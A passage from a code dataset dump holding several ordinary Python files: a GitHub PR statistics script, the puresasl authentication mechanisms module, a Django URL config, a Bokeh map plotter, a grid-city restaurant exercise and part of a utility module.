user_search:\n\t\trepo = [r.refresh() for r in gh.iter_user_repos(user) if r.id == 68479364]\n\t\treturn repo\n\telse:\n\t\trepo = [r.refresh() for r in gh.iter_user_repos('angular') if r.name == 'angular']\n\t\treturn repo\n\n\ndef get_prs():\n\tpulls = []\n\tfor repo in get_repos():\n\t\tpr = repo.iter_pulls(state='all', number=100)\n\t\tpr.refresh()\n\t\tfor prs in pr:\n\t\t\tpulls.append(prs)\n\treturn pulls\n\n\ndef check_pr():\n\trepo_contrib = 0\n\trepo_maintain = 0\n\tnet_eq = 0\n\tfor pulls in get_prs():\n\t\t#file_list\n\t\tfn = []\n\t\tpulls = pulls.refresh()\n\t\tfiles = pulls.iter_files()\n\t\tfor PullFile in files:\n\t\t\tfname = PullFile.filename.split(\".\")[1]\n\t\t\tif fname == \"md\":\n\t\t\t\trepo_maintain += 1\n\t\t\telif fname == \"txt\":\n\t\t\t\trepo_maintain += 1\n\t\t\telse:\n\t\t\t\trepo_contrib += 1\n\treturn \"For the last 100 PRs, there were the following number of contributions: \", repo_contrib, repo_maintain\n\ndef check_repos():\n\trepo = get_repos()\n\tassignee_dict = {}\n\tfor r in repo:\n\t\tissues = r.iter_issues(number=100, state='open')\n\t\tfor i in issues:\n\t\t\tassignee = str(i.assignee)\n\t\t\tif not assignee in assignee_dict:\n\t\t\t\tassignee_dict[assignee] = 1\n\t\t\telse:\n\t\t\t\tassignee_dict[assignee] += 1\n\n\n\n\tfor k, v in assignee_dict.items():\n\t\tprint(k, v)\n\n\n\n\nprint(check_repos())","sub_path":"good_pr.py","file_name":"good_pr.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358248962","text":"import base64\nimport hashlib\nimport hmac\nimport random\nimport struct\nimport sys\n\nfrom ctypes import create_string_buffer\nfrom puresasl import SASLError, SASLProtocolException\nfrom puresasl.util import bytes, num_to_bytes, bytes_to_num, quote\n\ntry:\n import kerberos\n _have_kerberos = True\nexcept ImportError:\n _have_kerberos = False\n\n\nclass Mechanism(object):\n \"\"\"\n The base class for all mechanisms.\n \"\"\"\n\n name = None\n \"\"\" The IANA registered name for the mechanism. \"\"\"\n\n score = 0\n \"\"\" A relative security score where higher scores correspond\n to more secure mechanisms. \"\"\"\n\n complete = False\n \"\"\" Set to True when SASL negotiation has completed succesfully. \"\"\"\n\n has_initial_response = False\n\n allows_anonymous = True\n \"\"\" True if the mechanism allows for anonymous logins. \"\"\"\n\n uses_plaintext = True\n \"\"\" True if the mechanism transmits sensitive information in plaintext. \"\"\"\n\n active_safe = False\n \"\"\" True if the mechanism is safe against active attacks. \"\"\"\n\n dictionary_safe = False\n \"\"\" True if the mechanism is safe against passive dictionary attacks. \"\"\"\n\n def __init__(self, sasl):\n self.sasl = sasl\n\n def process(self, challenge=None):\n \"\"\"\n Process a challenge request and return the response.\n\n :param challenge: A challenge issued by the server that\n must be answered for authentication.\n \"\"\"\n raise NotImplementedError()\n\n def wrap(self, outgoing):\n \"\"\"\n Wrap an outgoing message intended for the SASL server. Depending\n on the negotiated quality of protection, this may result in the\n message being signed, encrypted, or left unaltered.\n \"\"\"\n raise NotImplementedError()\n\n def unwrap(self, incoming):\n \"\"\"\n Unwrap a message from the SASL server. Depending on the negotiated\n quality of protection, this may check a signature, decrypt the message,\n or leave the message unaltered.\n \"\"\"\n raise NotImplementedError()\n\n def dispose(self):\n \"\"\"\n Clear all sensitive data, such as passwords.\n \"\"\"\n pass\n\n def _fetch_properties(self, *properties):\n \"\"\"\n Ensure this mechanism has the needed properties. If they haven't\n been set yet, the registered callback function will be called for\n each property to retrieve a value.\n \"\"\"\n needed = [p for p in properties if getattr(self, p, None) is None]\n if needed and not self.sasl.callback:\n raise SASLError('The following properties are required, but a '\n 'callback has not been set: %s' % ', '.join(needed))\n\n for prop in needed:\n setattr(self, prop, self.sasl.callback(prop))\n\n def _pick_qop(self, server_offered_qops):\n \"\"\"\n Choose a quality of protection based on the user's requirements and\n what the server supports.\n \"\"\"\n available_qops = set(self.sasl.qops) & set(server_offered_qops)\n if not available_qops:\n raise SASLProtocolException(\"Your requested quality of \"\n \"protection is one of (%s), but the server is only \"\n \"offering (%s)\" %\n (', '.join(self.sasl.qops), ', '.join(server_offered_qops)))\n else:\n self.qops = available_qops\n for qop in ('auth-conf', 'auth-int', 'auth'):\n if qop in self.qops:\n self.qop = qop\n break\n\n\nclass AnonymousMechanism(Mechanism):\n \"\"\"\n An anonymous user login mechanism.\n \"\"\"\n name = 'ANONYMOUS'\n score = 0\n\n uses_plaintext = False\n\n def process(self, challenge=None):\n self.complete = True\n return b'Anonymous, None'\n\n\nclass PlainMechanism(Mechanism):\n \"\"\"\n A plaintext user/password based mechanism.\n \"\"\"\n name = 'PLAIN'\n score = 1\n\n allows_anonymous = False\n\n def wrap(self, outgoing):\n return outgoing\n\n def unwrap(self, incoming):\n return incoming\n\n def __init__(self, sasl, username=None, password=None, identity='', **props):\n Mechanism.__init__(self, sasl)\n self.identity = identity\n self.username = username\n self.password = password\n\n def process(self, challenge=None):\n self._fetch_properties('username', 'password')\n self.complete = True\n return bytes(self.identity) + b'\\x00' + bytes(self.username) + b'\\x00' + bytes(self.password)\n\n def dispose(self):\n self.password = None\n\n\nclass CramMD5Mechanism(PlainMechanism):\n name = \"CRAM-MD5\"\n score = 20\n\n allows_anonymous = False\n uses_plaintext = False\n\n def __init__(self, sasl, username=None, password=None, **props):\n Mechanism.__init__(self, sasl)\n self.username = username\n self.password = password\n\n def process(self, challenge=None):\n if challenge is None:\n return None\n\n self._fetch_properties('username', 'password')\n mac = hmac.HMAC(key=bytes(self.password), digestmod=hashlib.md5)\n mac.update(challenge)\n return bytes(self.username) + b' ' + bytes(mac.hexdigest())\n\n def dispose(self):\n self.password = None\n\n\n# TODO: incomplete, not tested\nclass DigestMD5Mechanism(Mechanism):\n\n name = \"DIGEST-MD5\"\n score = 30\n\n allows_anonymous = False\n uses_plaintext = False\n\n enc_magic = 'Digest session key to client-to-server signing key magic'\n dec_magic = 'Digest session key to server-to-client signing key magic'\n\n def __init__(self, sasl, username=None, password=None, **props):\n Mechanism.__init__(self, sasl)\n self.username = username\n self.password = password\n\n self.qops = self.sasl.qops\n self.qop = b'auth'\n self.max_buffer = self.sasl.max_buffer\n\n self._rspauth_okay = False\n self._digest_uri = None\n self._a1 = None\n self._enc_buf = b''\n self._enc_key = None\n self._enc_seq = 0\n self._dec_buf = b''\n self._dec_key = None\n self._dec_seq = 0\n\n def dispose(self):\n self._rspauth_okay = None\n self._digest_uri = None\n self._a1 = None\n self._enc_buf = b''\n self._enc_key = None\n self._enc_seq = 0\n self._dec_buf = b''\n self._dec_key = None\n self._dec_seq = 0\n\n self.password = None\n self.key_hash = None\n self.realm = None\n self.nonce = None\n self.cnonce = None\n self.nc = 0\n\n def _MAC(self, seq, msg, key):\n \"\"\"\n \"\"\"\n mac = hmac.HMAC(key=key, digestmod=hashlib.md5)\n seqnum = num_to_bytes(seq)\n mac.update(seqnum)\n mac.update(msg)\n return mac.digest()[:10] + b'\\x00\\x01' + seqnum\n\n def wrap(self, outgoing):\n result = b''\n # Leave buffer space for the MAC\n mbuf = self.max_buffer - 10 - 2 - 4\n\n while outgoing:\n msg = outgoing[:mbuf]\n mac = self._MAC(self._enc_seq, msg, self._enc_key)\n self._enc_seq += 1\n msg += mac\n result += num_to_bytes(len(msg)) + msg\n outgoing = outgoing[mbuf:]\n\n return result\n\n def unwrap(self, incoming):\n \"\"\"\n \"\"\"\n incoming = b'' + incoming\n result = b''\n\n while len(incoming) > 4:\n num = bytes_to_num(incoming)\n if len(incoming) < (num + 4):\n return result\n\n mac = incoming[4:4 + num]\n incoming[4 + num:]\n msg = mac[:-16]\n\n mac_conf = self._MAC(self._dec_mac, msg, self._dec_key)\n if mac[-16:] != mac_conf:\n self._desc_sec = None\n return result\n\n self._dec_seq += 1\n result += msg\n\n return result\n\n def response(self):\n required_props = ['username']\n if not getattr(self, 'key_hash', None):\n required_props.append('password')\n self._fetch_properties(*required_props)\n\n resp = {}\n if 'auth-int' in self.qops:\n self.qop = b'auth-int'\n resp['qop'] = self.qop\n\n if getattr(self, 'realm', None) is not None:\n resp['realm'] = quote(self.realm)\n\n resp['username'] = quote(bytes(self.username))\n resp['nonce'] = quote(self.nonce)\n if self.nc == 0:\n self.cnonce = bytes('%s' % random.random())[2:]\n resp['cnonce'] = quote(self.cnonce)\n self.nc += 1\n resp['nc'] = bytes('%08x' % self.nc)\n\n self._digest_uri = bytes(self.sasl.service) + b'/' + \\\n bytes(self.sasl.host)\n resp['digest-uri'] = quote(self._digest_uri)\n\n a2 = b'AUTHENTICATE:' + self._digest_uri\n if self.qop != b'auth':\n a2 += b':00000000000000000000000000000000'\n resp['maxbuf'] = b'16777215' # 2**24-1\n resp['response'] = self.gen_hash(a2)\n return b','.join([bytes(k) + b'=' + bytes(v) for k, v in resp.items()])\n\n def parse_challenge(self, challenge):\n ret = {}\n var = b''\n val = b''\n in_var = True\n in_quotes = False\n new = False\n escaped = False\n for c in challenge:\n if sys.version_info >= (3, 0):\n c = bytes([c])\n if in_var:\n if c.isspace():\n continue\n if c == b'=':\n in_var = False\n new = True\n else:\n var += c\n else:\n if new:\n if c == b'\"':\n in_quotes = True\n else:\n val += c\n new = False\n elif in_quotes:\n if escaped:\n escaped = False\n val += c\n else:\n if c == b'\\\\':\n escaped = True\n elif c == b'\"':\n in_quotes = False\n else:\n val += c\n else:\n if c == b',':\n if var:\n ret[var] = val\n var = b''\n val = b''\n in_var = True\n else:\n val += c\n if var:\n ret[var] = val\n return ret\n\n def gen_hash(self, a2):\n if not getattr(self, 'key_hash', None):\n key_hash = hashlib.md5()\n user = bytes(self.username)\n password = bytes(self.password)\n realm = bytes(self.realm)\n kh = user + b':' + realm + b':' + password\n key_hash.update(kh)\n self.key_hash = key_hash.digest()\n\n a1 = hashlib.md5(self.key_hash)\n a1h = b':' + self.nonce + b':' + self.cnonce\n a1.update(a1h)\n response = hashlib.md5()\n self._a1 = a1.digest()\n rv = bytes(a1.hexdigest().lower())\n rv += b':' + self.nonce\n rv += b':' + bytes('%08x' % self.nc)\n rv += b':' + self.cnonce\n rv += b':' + self.qop\n rv += b':' + bytes(hashlib.md5(a2).hexdigest().lower())\n response.update(rv)\n return bytes(response.hexdigest().lower())\n\n def authenticate_server(self, cmp_hash):\n a2 = b':' + self._digest_uri\n if self.qop != b'auth':\n a2 += b':00000000000000000000000000000000'\n if self.gen_hash(a2) == cmp_hash:\n self._rspauth_okay = True\n\n def process(self, challenge=None):\n if challenge is None:\n needed = ['username', 'realm', 'nonce', 'key_hash',\n 'nc', 'cnonce', 'qops']\n if all(getattr(self, p, None) is not None for p in needed):\n return self.response()\n else:\n return None\n\n challenge_dict = self.parse_challenge(challenge)\n if self.sasl.mutual_auth and b'rspauth' in challenge_dict:\n self.authenticate_server(challenge_dict[b'rspauth'])\n else:\n if b'realm' not in challenge_dict:\n self._fetch_properties('realm')\n challenge_dict[b'realm'] = self.realm\n\n for key in (b'nonce', b'realm'):\n if key in challenge_dict:\n setattr(self, key, challenge_dict[key])\n\n self.nc = 0\n if b'qop' in challenge_dict:\n server_offered_qops = [x.strip() for x in challenge_dict[b'qop'].split(b',')]\n else:\n server_offered_qops = [b'auth']\n self._pick_qop(server_offered_qops)\n\n if b'maxbuf' in challenge_dict:\n self.max_buffer = min(\n self.sasl.max_buffer, int(challenge_dict[b'maxbuf']))\n\n return self.response()\n\n @property\n def complete(self):\n \"\"\"\n \"\"\"\n if not self.sasl.mutual_auth:\n return True\n\n if self._rspauth_okay and self.qop == b'auth-int':\n self._enc_key = hashlib.md5(self._a1 + self.enc_magic).digest()\n self._dec_key = hashlib.md5(self._a1 + self.dec_magic).digest()\n self.encoding = True\n return self._rspauth_okay\n\n\nclass GSSAPIMechanism(Mechanism):\n name = 'GSSAPI'\n score = 100\n\n allows_anonymous = False\n uses_plaintext = False\n active_safe = True\n\n def __init__(self, sasl, principal=None, **props):\n Mechanism.__init__(self, sasl)\n self.user = None\n self._have_negotiated_details = False\n self.host = self.sasl.host\n self.service = self.sasl.service\n self.principal = principal\n self._fetch_properties('host', 'service')\n\n krb_service = b'@'.join((bytes(self.service), bytes(self.host)))\n try:\n _, self.context = kerberos.authGSSClientInit(\n service=krb_service, principal=self.principal)\n except TypeError:\n if self.principal is not None:\n raise StandardError(\"Error: kerberos library does not support principal.\")\n _, self.context = kerberos.authGSSClientInit(\n service=krb_service)\n\n def process(self, challenge=None):\n if not self._have_negotiated_details:\n kerberos.authGSSClientStep(self.context, '')\n _negotiated_details = kerberos.authGSSClientResponse(self.context)\n self._have_negotiated_details = True\n return base64.b64decode(_negotiated_details)\n\n challenge = base64.b64encode(challenge)\n if self.user is None:\n ret = kerberos.authGSSClientStep(self.context, challenge)\n if ret == kerberos.AUTH_GSS_COMPLETE:\n self.user = kerberos.authGSSClientUserName(self.context)\n return ''\n else:\n response = kerberos.authGSSClientResponse(self.context)\n if response:\n response = base64.b64decode(response)\n else:\n response = ''\n return response\n\n kerberos.authGSSClientUnwrap(self.context, challenge)\n data = kerberos.authGSSClientResponse(self.context)\n plaintext_data = base64.b64decode(data)\n if len(plaintext_data) != 4:\n raise SASLProtocolException(\"Bad response from server\") # todo: better message\n\n layers_supported, = struct.unpack('B', plaintext_data[0])\n server_offered_qops = []\n if 0x01 & layers_supported:\n server_offered_qops.append('auth')\n if 0x02 & layers_supported:\n server_offered_qops.append('auth-int')\n if 0x04 & layers_supported:\n server_offered_qops.append('auth-conf')\n\n self._pick_qop(server_offered_qops)\n\n max_length, = struct.unpack('!i', '\\x00' + plaintext_data[1:])\n self.max_buffer = min(self.sasl.max_buffer, max_length)\n\n \"\"\"\n Construct the reply.\n\n byte 0: the selected qop. 1==auth, 2==auth-int, 4==auth-conf\n byte 1-3: the max length for any buffer sent back and forth on\n this connection. (big endian)\n the rest of the buffer: the authorization user name in UTF-8 -\n not null terminated.\n\n So, we write the max length and authorization user name first, then\n overwrite the first byte of the buffer with the qop. This is ok since\n the max length is writen out in big endian.\n \"\"\"\n i = len(self.user)\n fmt = '!I' + str(i) + 's'\n outdata = create_string_buffer(4 + i)\n struct.pack_into(fmt, outdata, 0, self.max_buffer, self.user)\n\n qop = 1\n if self.qop == 'auth-int':\n qop = 2\n elif self.qop == 'auth-conf':\n qop = 4\n struct.pack_into('!B', outdata, 0, qop)\n\n encodeddata = base64.b64encode(outdata)\n\n kerberos.authGSSClientWrap(self.context, encodeddata)\n response = kerberos.authGSSClientResponse(self.context)\n self.complete = True\n return base64.b64decode(response)\n\n def wrap(self, outgoing):\n if self.qop != 'auth':\n outgoing = base64.b64encode(outgoing)\n if self.qop == 'auth-conf':\n protect = 1\n else:\n protect = 0\n kerberos.authGSSClientWrap(self.context, outgoing, None, protect)\n return base64.b64decode(kerberos.authGSSClientResponse(self.context))\n else:\n return outgoing\n\n def unwrap(self, incoming):\n if self.qop != 'auth':\n incoming = base64.b64encode(incoming)\n kerberos.authGSSClientUnwrap(self.context, incoming)\n conf = kerberos.authGSSClientResponseConf(self.context)\n if 0 == conf and self.qop == 'auth-conf':\n raise StandardError(\"Error: confidentiality requested, but not honored by the server.\")\n return base64.b64decode(kerberos.authGSSClientResponse(self.context))\n else:\n return incoming\n\n def dispose(self):\n kerberos.authGSSClientClean(self.context)\n\n\n#: Global registry mapping mechanism names to implementation classes.\nmechanisms = dict((m.name, m) for m in (\n AnonymousMechanism,\n PlainMechanism,\n CramMD5Mechanism,\n DigestMD5Mechanism))\n\nif _have_kerberos:\n mechanisms[GSSAPIMechanism.name] = GSSAPIMechanism\n","sub_path":"puresasl/mechanisms.py","file_name":"mechanisms.py","file_ext":"py","file_size_in_byte":18558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"6201797","text":"from django.conf.urls import patterns, url\r\nfrom api import views\r\n\r\n__author__ = 'Obi'\r\n\r\nurlpatterns = patterns('',\r\n\r\n url('^requests/$', views.queue),\r\n\r\n url('^add_to_queue', views.add_to_queue),\r\n\r\n url('^requests/order', views.request_order),\r\n\r\n url('^requests/not_sure', views.request_not_sure),\r\n\r\n url('^requests/cancel', views.request_cancel),\r\n\r\n url('^get_track/$', views.get_track),\r\n\r\n url('^add_delivery/$', views.add_delivery),\r\n\r\n url('^add_post_delivery/$', views.add_post_delivery),\r\n\r\n url('^get_preorders_count/$', views.get_orders_for_collection),\r\n)\r\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"639318085","text":"import json\n\nimport geopandas as gpd\nimport pandas as pd\nfrom bokeh.models import (\n Circle,\n GeoJSONDataSource,\n HoverTool,\n Legend,\n Patches,\n WheelZoomTool,\n CustomJS,\n)\nfrom bokeh.plotting import figure\nfrom bokeh.tile_providers import Vendors, get_provider\nfrom pyproj import Proj, transform\nfrom shapely import wkt\n\n\ndef update(PATH):\n try:\n # load metadata\n DF = pd.read_csv(PATH)\n DF = DF.dropna(subset=[\"geometry\"])\n DF[\"img_sd\"] = DF[\"img_sd\"].str.strip('\"')\n\n # create geodataframe for points with images\n geodf = to_geodf(DF)\n\n # transform map projection\n map_geodf = apply_transform(geodf)\n\n # update map\n export_map = update_map(map_geodf)\n\n return export_map\n\n except Exception as e:\n print(str(e))\n\n\ndef to_geodf(df):\n \"\"\"\n Return geodf\n \"\"\"\n\n df[\"geometry\"] = df[\"geometry\"].astype(str).apply(wkt.loads)\n\n geodf = gpd.GeoDataFrame(df, geometry=\"geometry\", crs=\"epsg:4326\")\n\n return geodf\n\n\ndef transform_proj(row):\n \"\"\"\n Transforms WGS84(epsg:4326) to WEBMERCATOR(epsg:3857)\n \"\"\"\n\n try:\n proj_in = Proj(\"epsg:4326\")\n proj_out = Proj(\"epsg:3857\")\n x1, y1 = row[\"lat\"], row[\"lng\"]\n x2, y2 = transform(proj_in, proj_out, x1, y1)\n # print(f\"({x1}, {y1}) to ({x2}, {y2})\")\n return pd.Series([x2, y2])\n\n except Exception as e:\n print(str(e))\n\n\ndef apply_transform(geodf):\n \"\"\"\n Convert WGS84(epsg:4326) to WEBMERCATOR(epsg:3857) coordinates\n \"\"\"\n\n # print(\"Transforming projections...\")\n geodf[[\"lat2\", \"lng2\"]] = geodf.apply(transform_proj, axis=1)\n # print(\"Done.\")\n\n geodf[\"geometry\"] = geodf[\"geometry\"].to_crs(\"epsg:3857\")\n\n # reduce columns and return final geodataframe\n\n map_geodf = geodf[[\"id\", \"title\", \"creator\", \"img_sd\", \"geometry\", \"lat2\", \"lng2\"]]\n\n return map_geodf\n\n\ndef update_map(map_geodf):\n\n # filter map_geodf\n map_geodf_img = map_geodf.copy().dropna(subset=[\"img_sd\"])\n map_geodf_noimg = map_geodf.copy()[map_geodf[\"img_sd\"].isna()]\n\n # create a geodatasource\n geosource_img = GeoJSONDataSource(geojson=map_geodf_img.to_json())\n geosource_noimg = GeoJSONDataSource(geojson=map_geodf_noimg.to_json())\n\n # Description from points\n TOOLTIPS1 = \"\"\"\n
\n \n

@id

\n

@creator

\n \n
\n \"\"\"\n TOOLTIPS2 = \"\"\"\n
\n

@id

\n

@creator

\n
\n \"\"\"\n callback_tp = CustomJS(\n code=\"\"\"\n var tooltips = document.getElementsByClassName(\"bk-tooltip\");\n for (var i = 0, len = tooltips.length; i < len; i ++) {\n tooltips[i].style.top = \"\"; \n tooltips[i].style.right = \"\";\n tooltips[i].style.bottom = \"0px\";\n tooltips[i].style.left = \"0px\";\n }\n \"\"\"\n )\n\n # Base map\n maps = figure(\n x_axis_type=\"mercator\",\n y_axis_type=\"mercator\",\n plot_width=1400,\n plot_height=900,\n toolbar_location=None,\n )\n\n tile_provider = get_provider(Vendors.CARTODBPOSITRON_RETINA)\n maps.add_tile(tile_provider)\n\n # construct points and wedges from hover\n viewcone1 = maps.patches(\n xs=\"xs\",\n ys=\"ys\",\n source=geosource_img,\n fill_color=\"white\",\n fill_alpha=0,\n line_color=None,\n hover_alpha=0.7,\n hover_fill_color=\"grey\",\n hover_line_color=\"grey\",\n )\n\n viewcone2 = maps.patches(\n xs=\"xs\",\n ys=\"ys\",\n source=geosource_noimg,\n fill_color=\"white\",\n fill_alpha=0,\n line_color=None,\n hover_alpha=0.7,\n hover_fill_color=\"grey\",\n hover_line_color=\"grey\",\n )\n\n point_noimg = maps.circle(\n x=\"lat2\",\n y=\"lng2\",\n source=geosource_noimg,\n size=7,\n fill_color=\"orange\",\n fill_alpha=0.5,\n line_color=\"dimgray\",\n )\n\n point_img = maps.circle(\n x=\"lat2\",\n y=\"lng2\",\n source=geosource_img,\n size=7,\n fill_color=\"orange\",\n fill_alpha=0.5,\n line_color=\"dimgray\",\n )\n\n # create a hovertool\n h1 = HoverTool(\n renderers=[point_img],\n tooltips=TOOLTIPS1,\n mode=\"mouse\",\n show_arrow=False,\n callback=callback_tp,\n )\n h2 = HoverTool(\n renderers=[point_noimg],\n tooltips=TOOLTIPS2,\n mode=\"mouse\",\n show_arrow=False,\n callback=callback_tp,\n )\n\n maps.add_tools(h1, h2)\n maps.toolbar.active_scroll = maps.select_one(WheelZoomTool)\n maps.xaxis.major_tick_line_color = None\n maps.xaxis.minor_tick_line_color = None\n maps.yaxis.major_tick_line_color = None\n maps.yaxis.minor_tick_line_color = None\n maps.xaxis.major_label_text_font_size = \"0pt\"\n maps.yaxis.major_label_text_font_size = \"0pt\"\n\n return maps\n","sub_path":"src/modules/maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":5610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"514851664","text":"from math import hypot\n# Initialising the city of GRIDBOURNE\nGRIDBOURNE = []\nletter = list(map(chr, range(65, 75)))\nnumber = list(num for num in range(1, 11))\nfor i in letter:\n row = []\n for j in number:\n row.append('{}{}'.format(i, j))\n GRIDBOURNE.append(row)\n\ndef cord_of_restraunts(x, y):\n ''' Takes input x,y coordintaes of users location, finds the coordinates of\n restraunts in neighbourhood returning list float coordinates(HELPER FUNC)'''\n\n cr_rest_cord = [float((str(abs(x)))[0]), float((str(abs(y)))[0])]\n mr_rest_cord = [float((str(abs(x)))[0] + '.5'),\n float((str(abs(y)))[0] + '.5')]\n\n return [cr_rest_cord, mr_rest_cord]\n\ndef dist_rest(x, y, a, b):\n ''' Takes user location (a, b) and neighbourhood to be tested:(x, y) and\n finds user distance restraunts returning a list (HELPER FUNC)'''\n\n # Finding coordinates of the middle and corner restraunts in neighbourhood\n rest_cord = cord_of_restraunts(x, y)\n\n # Finding user location with origin as CR followed by origin as MR\n relative_xcr = a - rest_cord[0][0]\n relative_ycr = b - rest_cord[0][1]\n relative_xmr = a - rest_cord[1][0]\n relative_ymr = b - rest_cord[1][1]\n\n # Assuming CR,MR cords as origin to calculate eucl distance using hypot\n dist_cr = hypot(relative_xcr, relative_ycr)\n dist_mr = hypot(relative_xmr, relative_ymr)\n\n return [dist_cr, dist_mr]\n\ndef find_my_neighbourhood(x, y):\n ''' Takes an x and y coordinate as input to find the location of user in\n terms of neighbourhood returning a list'''\n\n # Checking row and column user is located in and assigning respectively\n y = str(abs(y))\n x = str(abs(x))\n col = (int(x[0]))\n row = (int(y[0]))\n\n return GRIDBOURNE[row][col]\n\ndef find_all_restaurants_in_neighbourhood(x, y):\n ''' Calls find_my_neighbourhood to check location of user and returns the 2\n restraunts in acsending alphabetical order as a list'''\n\n nhood = find_my_neighbourhood(x, y)\n nhood_rest = [nhood + 'CR', nhood + 'MR']\n\n return nhood_rest\n\ndef find_closest_restaurant_in_neighbourhood(x, y):\n ''' Takes user location (x, y) as inputs and finds the nearest\n restraunts to the user in their neighbourhood returning a list'''\n\n # Calling on dist_rest to calculate restraunt distances\n dist_cr = dist_rest(x, y, x, y)[0]\n dist_mr = dist_rest(x, y, x, y)[1]\n\n # Checking for closest restraunt\n if dist_cr == dist_mr:\n return find_all_restaurants_in_neighbourhood(x, y)\n elif dist_cr < dist_mr:\n return [(find_all_restaurants_in_neighbourhood(x, y))[0]]\n else:\n return [(find_all_restaurants_in_neighbourhood(x, y))[1]]\n\ndef find_farthest_restaurant_in_neighbourhood(x, y):\n ''' Takes user location (x, y) as inputs and finds the farthest\n restraunts to the user in their neighbourhood returning a list'''\n\n # Calling on dist_rest to calculate restraunt distances\n dist_cr = dist_rest(x, y, x, y)[0]\n dist_mr = dist_rest(x, y, x, y)[1]\n\n # Checking for closest restraunt\n if dist_cr == dist_mr:\n return find_all_restaurants_in_neighbourhood(x, y)\n elif dist_cr > dist_mr:\n return [(find_all_restaurants_in_neighbourhood(x, y))[0]]\n else:\n return [(find_all_restaurants_in_neighbourhood(x, y))[1]]\n\ndef find_closest_restaurant(x, y):\n ''' Takes user location (x, y) as inputs and finds the closest restruants\n regardless of neighbourhood returning a list'''\n\n # List of curr, right, left, up, down and diag_topright neighbourhoods\n near_hoods = [(x, y), (x+1, y), (x-1, y), (x, y+1), (x, y-1), (x+1, y+1)]\n\n # Scenario 2: location in left most column of GRIDBOURNE\n if x < 1:\n del near_hoods[2]\n\n # Scenario 2: location in right most column of GRIDBOURNE\n if x >= 9:\n del near_hoods[1]\n\n # Scenario 3: location in top column of GRIDBOURNE\n if y >= 9:\n del near_hoods[3]\n\n # Scenario 4: location in bottom column of GRIDBOURNE\n if y < 1:\n del near_hoods[4]\n\n # Running through list of nearby restraunts to compile list of closest\n nearest_rest = [[(0, 0), 40000, '']]\n for hood in near_hoods:\n dist_to_rest = dist_rest(hood[0], hood[1], x, y)\n if dist_to_rest[0] < nearest_rest[0][1]:\n nearest_rest = [[hood, dist_to_rest[0], 'CR']]\n elif dist_to_rest[0] == nearest_rest[0][1]:\n nearest_rest.append([hood, dist_to_rest[0], 'CR'])\n if dist_to_rest[1] < nearest_rest[0][1]:\n nearest_rest = [[hood, dist_to_rest[1], 'MR']]\n elif dist_to_rest[1] == nearest_rest[0][1]:\n nearest_rest.append([hood, dist_to_rest[1], 'MR'])\n\n # Formatting to return just neighbourhood and restraunt list\n final_list = []\n for mem in nearest_rest:\n final_list.append('{}{}'.format(find_my_neighbourhood(mem[0][0],\n mem[0][1]), mem[2]))\n\n return sorted(list(set(final_list)))\n\ndef find_closest_restaurant_on_path(list_of_stops):\n ''' Takes a list of lists with x,y coordinates and returns nearest\n restaurant along that path'''\n\n final_list = []\n for stop in list_of_stops:\n final_list.append(find_closest_restaurant(stop[0], stop[1]))\n\n return final_list\n","sub_path":"proj3.grouptypes.py","file_name":"proj3.grouptypes.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"593601116","text":"from data.user_input.project.printMessageInput import PrintMessageInput\nfrom functools import wraps\nfrom time import time\nfrom scipy.sparse import issparse\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtCore import Qt\nimport configparser\nimport numpy as np\nimport os\nfrom scipy.spatial.transform import Rotation\n\n\n\ndef split_sequence(sequence, size):\n ''' \n This function breaks a sequence in equal sized blocks of choosen size.\n\n Parameters\n ----------\n sequence: list like object\n Any iterable object.\n\n size: int\n Size of the desired chunks.\n\n Returns\n -------\n out: list\n list with small chuncks with desired size.\n\n Examples\n --------\n >>> colors = [255,0,0,0,255,0,0,0,255] # a list with colors concatenated.\n >>> split_sequence(colors, 3)\n [[255,0,0], [0,255,0], [0,0,255]]\n '''\n\n subsequences = []\n for start in range(0, len(sequence), size):\n end = start + size\n subsequence = sequence[start:end]\n subsequences.append(subsequence)\n return subsequences\n\ndef slicer(iterable, argument):\n ''' \n A function to deal better with elements. \n\n Parameters\n ----------\n iterable: Iterable sequence.\n\n argument: str, int, iterable\n argument can be 'all', the index, or a sequence of indexes\n \n Yields\n ------\n out: Value according to the argument.\n\n Examples\n --------\n >>> sequence = ['a', 'b', 'c', 'd']\n >>> for i in slicer(sequence, [1,3,2]):\n print(i)\n 'b'\n 'd'\n 'c'\n >>> for i in slicer(sequence, 'all'):\n print(i)\n 'a'\n 'b'\n 'c'\n 'd'\n '''\n\n if isinstance(argument, str) and argument == 'all':\n if isinstance(iterable, dict):\n for i in iterable.values():\n yield i \n else:\n for i in iterable:\n yield i \n\n elif isinstance(argument, int):\n yield iterable[argument]\n \n elif hasattr(argument, '__iter__'):\n for i in argument:\n yield iterable[i]\n \n else:\n raise AttributeError('Argument not supported')\n\ndef timer(function):\n ''' \n A decorator to time functions.\n\n Parameters\n ----------\n function: Any function.\n\n Returns\n -------\n function: A function that does the same as input, but prints the time spent.\n\n Examples\n --------\n >>> @timer\n >>> def timeConsumingFunction(x):\n ... doSomethingHeavy()\n ...\n >>> timeConsumingFunction(5)\n Time to finish timeConsumingFunction: 35.5235 [s]\n '''\n\n @wraps(function)\n def wrapper(*args, **kwargs):\n start_time = time()\n values = function(*args, **kwargs)\n end_time = time()\n print(f'Time to finish {function.__name__}: {end_time - start_time} [s]')\n return values\n return wrapper\n \ndef m_to_mm(m):\n ''' \n Converts meter to millimeter.\n\n Parameters\n ----------\n m: int, float\n Value in meters\n\n Returns\n -------\n out: float\n Value in millimeters\n '''\n return float(m) * 1000\n\ndef mm_to_m(mm):\n ''' \n Converts meter to millimeter.\n\n Parameters\n ----------\n mm: int, float\n Value in millimeters\n\n Returns\n -------\n out: float\n Value in meters\n\n '''\n return float(mm) / 1000\n\ndef inverse_matrix_Nx3x3(A):\n ''' \n Given a 3x3xN matrix, compute its inverse faster than \n numpy's default function.\n\n Parameters\n ----------\n A: numpy.ndarray\n Matrix of shape 